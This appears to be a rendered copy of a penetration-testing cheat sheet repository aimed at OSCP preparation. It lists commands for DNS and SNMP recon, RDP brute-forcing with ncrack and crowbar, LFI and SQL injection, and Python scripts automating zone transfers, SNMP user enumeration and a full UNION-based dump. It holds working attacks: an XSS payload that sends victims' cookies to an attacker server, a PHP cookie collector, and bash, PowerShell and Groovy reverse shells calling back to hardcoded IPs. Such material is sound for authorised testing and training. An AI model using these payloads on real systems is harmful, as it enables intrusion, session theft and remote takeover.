Pentest Cheat Sheets
Pentest-Cheat-Sheets
This repo is a collection of code snippets and commands to make our lives easier. The main
purpose is not to be a crutch but to avoid wasting precious time. It also helps those preparing
for the OSCP: you'll find many ways to do things without the Metasploit Framework.
Ninja Tricks
Recon
DNS
SPF
Nmap
NetCat
SNMP
Mysql
MS SQL
Web Enumeration
Exploitation
System Network
RDP
Pass The Hash
https://md2pdf.netlify.app/ Page 1 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
Windows-Shell
Web Application
Web Remote Code Execution
LFI
encode
XSS
SQLi
sqlmap
Bare Hands
Jenkins
Post-exploitation
Reverse Shell
PHP Reverse Shell
Perl Reverse Shell
python Reverse Shell
Ruby Reverse Shell
bash Reverse Shell
powershell Reverse Shell
Java Reverse Shell
Xterm Reverse Shell
Linux
Linux Privilege Escalation
Data Harvesting and Enumeration
Linux Pivot
Sshuttle
VPNPivot
SSH Tunneling
Linux Backdooring
Windows
Windows Enumeration
Windows Privilege Escalation
Hashdump
Transferring Files Without Metasploit
Backdooring
Windows Pivot
Openssh for Tunneling
Plink
Resources
HTTP/HTTPS Servers
Wordlist
seclist
cotse
PacketStorm
Default Passwords
Default Password
Router Password
Leak
Pastebin
Tables
Contribution
Recon
DNS
Nslookup
Resolve a given hostname to the corresponding IP.
nslookup targetorganization.com
Zone Transfer
First find the authoritative nameservers, then ask one of them for the zone (the ls command exists in the Windows nslookup only):
host -t ns domain.com
nslookup
server <nameserver found above>
ls -d domain.com
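The same zone-transfer check as a script, added here as an example (it is not part of the original cheat sheet): it lists the nameservers with host, tries AXFR against every one of them with dig, and reports which server leaked the zone. host and dig are assumed to be installed; the two captured outputs in the block are constructed samples so the parsing runs offline.

```python
"""Zone-transfer check: enumerate a domain's nameservers and try AXFR against
each. Added example, not part of the original cheat sheet. Shells out to
`host` and `dig` (assumed installed); the parsers are pure Python."""
import re
import subprocess

# Constructed sample of `host -t ns domain.com`
HOST_NS = "domain.com name server ns1.domain.com.\ndomain.com name server ns2.domain.com.\n"

# Constructed sample of `dig axfr domain.com @ns1.domain.com` when the server refuses
REFUSED = "; <<>> DiG 9.18.1 <<>> axfr domain.com @ns1.domain.com\n;; global options: +cmd\n; Transfer failed.\n"

# Constructed sample of a successful transfer (a few records)
SUCCESS = """\
; <<>> DiG 9.18.1 <<>> axfr domain.com @ns2.domain.com
domain.com.\t\t3600\tIN\tSOA\tns1.domain.com. hostmaster.domain.com. 2023020101 3600 900 604800 86400
domain.com.\t\t3600\tIN\tNS\tns1.domain.com.
www.domain.com.\t\t300\tIN\tA\t192.0.2.10
vpn.domain.com.\t\t300\tIN\tA\t192.0.2.11
domain.com.\t\t3600\tIN\tSOA\tns1.domain.com. hostmaster.domain.com. 2023020101 3600 900 604800 86400
;; XFR size: 5 records (messages 1, bytes 201)
"""

RR = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(.+)$")


def parse_nameservers(host_output):
    """'domain.com name server ns1.domain.com.' -> 'ns1.domain.com'"""
    return [line.split()[-1].rstrip(".") for line in host_output.splitlines()
            if " name server " in line]


def parse_axfr(output):
    """List of (name, type, rdata) if the transfer succeeded, else None."""
    if "Transfer failed" in output:
        return None
    records = []
    for line in output.splitlines():
        if line.startswith(";") or not line.strip():
            continue  # dig comments and blank lines
        m = RR.match(line)
        if m:
            records.append((m.group(1), m.group(3), m.group(4)))
    return records or None


def hosts_from_records(records):
    """Unique hostnames with A/AAAA records: the useful recon output."""
    return sorted({name.rstrip(".") for name, rtype, _ in records if rtype in ("A", "AAAA")})


def nameservers(domain):
    out = subprocess.run(["host", "-t", "ns", domain], capture_output=True, text=True).stdout
    return parse_nameservers(out)


def try_axfr(domain, ns):
    out = subprocess.run(["dig", "axfr", domain, "@" + ns, "+time=5"],
                         capture_output=True, text=True).stdout
    return parse_axfr(out)


if __name__ == "__main__":
    import sys
    target = sys.argv[1]
    for ns in nameservers(target):
        recs = try_axfr(target, ns)
        print(f"{ns}: {'REFUSED' if recs is None else str(len(recs)) + ' records'}")
        if recs:
            print("\n".join(hosts_from_records(recs)))
```

Every nameserver is tried separately because secondaries are often configured more loosely than the primary; one permissive server is enough to leak the whole zone.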
Auto tools
DNSenum
dnsenum targetdomain.com
DNSmap
dnsmap targetdomain.com
dnsmap targetdomain.com -r
Fierce.pl
HostMap
SPF Recon
Dmarc
Online Tools
https://dnsdumpster.com/
https://network-tools.com/nslook/
https://www.dnsqueries.com/en/
https://mxtoolbox.com/
Nmap
Stealth Scan
Aggressive scan
No ping, no DNS resolution, show only open ports, scan all TCP ports
Nmap verbose scan: SYN stealth scan, T4 timing, OS and service version detection, traceroute and
default scripts against the services found
OS Fingerprint
nmap -O $ip
Quick Scan
output to a file
Nmap Discovery
NetCat
Port Scanner
One port
nc -nvz 192.168.1.23 80
Port Range
Send files
Server
Client
Client
Client
Banner Grabbing
Request
nc target port
HTTP_Verb path http/version
Host: url
Response
nc www.bla.com.br 80
HEAD / HTTP/1.0
Host: www.bla.com.br
SNMP
OneSixtyone
onesixtyone -c COMMUNITY_FILE -i Target_ip
snmpwalk
Walking MIB's
Walking a specific MIB node:
snmpwalk -c <community> -v <version> <target_ip> <MIB node>
Example: user accounts = 1.3.6.1.4.1.77.1.2.25
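What the user-accounts node looks like in practice, as an added example (not part of the original cheat sheet): a wrapper around snmpwalk that walks 1.3.6.1.4.1.77.1.2.25 and turns the output into a plain list of Windows account names. The OID index in that table is the username length followed by its ASCII codes, so the script decodes it and cross-checks it against the STRING value. net-snmp's snmpwalk is assumed to be installed; the sample output in the block is constructed so the parser runs offline.

```python
"""Windows account names from the LanManager user table (1.3.6.1.4.1.77.1.2.25)
via snmpwalk. Added example, not part of the original cheat sheet; assumes
net-snmp's snmpwalk is installed."""
import re
import subprocess

USER_TABLE = "1.3.6.1.4.1.77.1.2.25"

# Constructed sample of `snmpwalk -c public -v 1 <ip> 1.3.6.1.4.1.77.1.2.25`:
# the OID index is <length>.<ascii code>... of the username.
SAMPLE = """\
iso.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
iso.3.6.1.4.1.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = STRING: "Administrator"
"""

LINE = re.compile(r'^\S*77\.1\.2\.25\.1\.1\.(?P<index>[\d.]+) = STRING: "(?P<name>[^"]*)"$')


def decode_index(index):
    """'5.71.117.101.115.116' -> 'Guest' (length-prefixed ASCII codes)."""
    parts = [int(p) for p in index.split(".")]
    length, codes = parts[0], parts[1:]
    if len(codes) != length:
        raise ValueError(f"index length {length} does not match {len(codes)} codes")
    return "".join(chr(c) for c in codes)


def parse_users(output):
    """Usernames from snmpwalk output; the decoded index must match the value."""
    users = []
    for line in output.splitlines():
        m = LINE.match(line.strip())
        if m and decode_index(m.group("index")) == m.group("name"):
            users.append(m.group("name"))
    return users


def walk_users(target, community="public", version="1"):
    out = subprocess.run(
        ["snmpwalk", "-c", community, "-v", version, target, USER_TABLE],
        capture_output=True, text=True).stdout
    return parse_users(out)


if __name__ == "__main__":
    import sys
    for user in walk_users(sys.argv[1], *sys.argv[2:3]):
        print(user)
```

Feed the community string found with onesixtyone into walk_users; the resulting list goes straight into a password spray against SMB or RDP later on.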
snmp-check
snmp-check -t target_IP
snmp-check -t TARGET -c COMMUNITY
snmp-check -t 172.20.10.5
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
Default Credentials
/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
MYSQL
MSSQL
Web Enumeration
Dirsearch
dirsearch -u https://target.com -e .
dirb
Gobuster
Exploitation
System Network
RDP
xfreerdp
login
xfreerdp /u:<user> /p:<password> /v:<target_ip>
(add /d:<domain> for a domain account and /g:<gateway> when going through an RD Gateway)
NCRACK
ncrack -vv --user <username> / -U <username_wordlist> --pass <password> / -P <password_wordlist> <target_ip>:3389
Crowbar
crowbar -b rdp -u <user> / -U <user_wordlist> -c <password> / -C <password_wordlist> -s <target_ip>/32 -v
Tool:
pth-toolkit
Web Application
http://<target>/index.php?parameter=value
How to Test
http://<target>/index.php?parameter=php://filter/convert.base64-encode/resource=inde
http://<target>/script.php?page=../../../../../../../../etc/passwd
http://<target>/script.php?page=../../../../../../../../boot.ini
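The handler behind a page= parameter, written the vulnerable way and the hardened way, as an added example (not part of the original cheat sheet). It mimics a PHP include('pages/' . $_GET['page']) in Python so it runs offline against a constructed document root; the traversal payload reads a config file outside pages/, the hardened version rejects both the traversal and the php://filter wrapper. Python has no php:// stream wrappers, so the vulnerable handler only demonstrates the traversal half of the tests above.

```python
"""Local file inclusion: a page= handler two ways. Added example, not part of the
original cheat sheet; emulates a PHP include() against a constructed web root."""
import os
import tempfile

# Constructed web root: one legitimate page and a secret outside pages/
ROOT = tempfile.mkdtemp()
os.makedirs(os.path.join(ROOT, "pages"))
with open(os.path.join(ROOT, "pages", "home.php"), "w") as f:
    f.write("<h1>home</h1>")
with open(os.path.join(ROOT, "config.php"), "w") as f:
    f.write("<?php $db_pass = 'hunter2';")

ALLOWED_PAGES = {"home.php", "about.php"}


def include_vulnerable(page):
    """include('pages/' . $_GET['page']): the prefix does not stop ../ traversal."""
    with open(os.path.join(ROOT, "pages", page)) as f:
        return f.read()


def include_hardened(page):
    """Resolve the path, require it to stay under pages/, then allow-list the
    file name. php://filter/... is just a non-existent path here and fails the
    allow-list; in PHP the same allow-list is what keeps wrappers out."""
    base = os.path.realpath(os.path.join(ROOT, "pages"))
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"traversal blocked: {page!r}")
    if os.path.basename(target) not in ALLOWED_PAGES:
        raise PermissionError(f"not an allowed page: {page!r}")
    with open(target) as f:
        return f.read()


def probe(payload):
    """Outcome of one payload against each handler (the 'How to Test' step)."""
    results = {}
    for name, handler in (("vulnerable", include_vulnerable), ("hardened", include_hardened)):
        try:
            results[name] = "read " + handler(payload)[:16]
        except (FileNotFoundError, PermissionError) as e:
            results[name] = type(e).__name__
    return results


if __name__ == "__main__":
    for p in ("home.php", "../config.php", "../../../../../../../../etc/passwd",
              "php://filter/convert.base64-encode/resource=home.php"):
        print(p, probe(p))
```

Note the order of the checks: realpath first, so encoded or doubled separators are normalised before the directory test, and the allow-list is a list of file names, not a denylist of strings such as "../".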
LFI Payloads
encode
XSS
Reflected
Simple test
This is a simple test to see what happens; it is not proof that the field is vulnerable to XSS.
<plaintext>
<script>alert('Found')</script>
"><script>alert('Found')</script>">
<script>alert(String.fromCharCode(88,83,83))</script>
" onload="alert(String.fromCharCode(88,83,83))
" onload="alert('XSS')
Persistent
>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibili
PHP collector
<?php
// receives the cookie sent by the payload below and appends it to cookie.txt
$cookie=$_GET['cookie'];
$useragent=$_SERVER['HTTP_USER_AGENT'];
$file=fopen('cookie.txt', 'a');
fwrite($file,"USER AGENT:$useragent || COOKIE=$cookie\n");
fclose($file);
?>
<script>new Image().src="http://OUR_SERVER_IP/colector.php?cookie="+document.cookie;</script>
<input onfocus="document.body.innerHTML=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2
XSS payloads
SQLI
Sql Injection
Sqlmap
GET
Error-Based
Simple test
Example:
http://192.168.1.104/Less-1/?id=5'
List databases
List tables
List columns
Dump all
Set Cookie
Checking Privileges
Reading file
Writing file
POST
You can also use a file like with the post request:
Bare Hands
GET
Error-Based
Simple test
Example:
http://192.168.1.104/Less-1/?id=5'
Fuzzing
http://192.168.1.104/Less-1/?id=-1 order by 1
http://192.168.1.104/Less-1/?id=-1 order by 2
http://192.168.1.104/Less-1/?id=-1 order by 3
mysql
(using the same number of columns found in the previous step)
postgresql
(using the same number of columns found in the previous step)
Finding version
mysql
postgres
mysql
postgres
mysql
Finding databases
mysql
postgres
mysql
postgres
mysql
postgres
Concatenate
Example:
in one query
Current user
DBMS version
Database name
http://192.168.1.104/Less-1/?id=-1 or db_name(0)=0 --
Remember to change dbname and tablename according to the situation. After each iteration a new
column name is found; add it to the previously found column names, separated by commas, as in
the next sample.
Actual data
After each iteration a new column name is found; add it to the previously found column names,
separated by commas, as in the next sample.
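The whole bare-hands walk (id=5' to confirm, ORDER BY n for the column count, UNION SELECT for the version, the table list, the column list and finally the rows) run end to end, as an added example that is not part of the original cheat sheet. It uses a constructed in-memory SQLite database so it runs offline; SQLite stands in for MySQL/Postgres, so the names differ (sqlite_version() instead of version(), sqlite_master instead of information_schema) but the injection sequence is the same. The parameterised lookup at the end is the fix.

```python
"""UNION-based SQL injection walk against a constructed SQLite database. Added
example, not part of the original cheat sheet; SQLite stands in for the MySQL
and Postgres targets the notes above describe."""
import re
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE products(id INTEGER, name TEXT, price REAL);
INSERT INTO products VALUES (1,'widget',9.5),(2,'gadget',19.0);
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1,'admin','s3cr3t'),(2,'bob','hunter2');
""")


def lookup_vulnerable(user_input):
    """The Less-1 style endpoint: ?id= is concatenated straight into the SQL."""
    return db.execute(
        f"SELECT id, name, price FROM products WHERE id='{user_input}'").fetchall()


def lookup_safe(user_input):
    """Same query with a bound parameter: the input can only ever be a value."""
    return db.execute(
        "SELECT id, name, price FROM products WHERE id=?", (user_input,)).fetchall()


def simple_test():
    """id=5' : a lone quote only breaks the syntax if it reaches the SQL parser."""
    try:
        lookup_vulnerable("5'")
    except sqlite3.OperationalError:
        return True
    return False


def find_column_count(max_cols=20):
    """ORDER BY n errors as soon as n exceeds the number of selected columns."""
    for n in range(1, max_cols + 1):
        try:
            lookup_vulnerable(f"-1' ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_select(exprs, source=""):
    """-1' UNION SELECT <exprs>[,NULL...] <source>-- padded to the column count."""
    cols = find_column_count()
    padded = list(exprs) + ["NULL"] * (cols - len(exprs))
    return lookup_vulnerable(f"-1' UNION SELECT {','.join(padded)} {source}--")


def dbms_version():
    return union_select(["sqlite_version()"])[0][0]


def table_names():
    # group_concat() folds every name into one cell: the "in one query" trick
    row = union_select(["group_concat(name)"], "FROM sqlite_master WHERE type='table'")
    return sorted(row[0][0].split(","))


def column_names(table):
    # no information_schema in SQLite: the CREATE statement is in sqlite_master
    ddl = union_select(["sql"], f"FROM sqlite_master WHERE name='{table}'")[0][0]
    return re.findall(r"(\w+)\s+\w+", ddl[ddl.index("(") + 1:ddl.rindex(")")])


def dump(table, columns):
    """Actual data: one UNION with the discovered column names."""
    rows = union_select(list(columns), f"FROM {table}")
    return sorted(r[:len(columns)] for r in rows)


if __name__ == "__main__":
    print("injectable:", simple_test())
    print("columns:", find_column_count())
    print("version:", dbms_version())
    for t in table_names():
        print(t, column_names(t))
    print(dump("users", ["username", "password"]))
    print("safe handler:", lookup_safe("-1' UNION SELECT 1,2,3--"))
```

The comment marker matters per DBMS: SQLite and Postgres accept a bare --, while MySQL needs -- followed by a space (or #), which is why the samples above end in " --".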
Shell commands
Jenkins
Post Exploitation
Reverse Shell
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.36.167/1337 0>&1'");
function reverse_powershell {
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
}
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to
do this is with Xnest (to be run on your system):
Xnest :1
You’ll need to authorise the target to connect to you (command also run on your host):
xhost +targetip
Linux
Windows
Powershell
python -m http.server
python -m SimpleHTTPServer 80
FTP
Windows Client
ftp
open target_ip port
open 192.168.1.22 21
We can simply run ftp -s:ftp_commands.txt to download a file with no user interaction, like this:
Apache Server
cp nc.exe /var/www/html
systemctl start apache2
client
Windows Pivoting
Now, if needed, adjust the firewall rules to your requirements:
Resources
HTTP/HTTPS Servers
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
Wordlists
PacketStorm
SecList
cotse
Default Password
DefaultPassword
RouterPassword
Leak
Pastebin
Tables
RainbowCrack
Contribution
HOW TO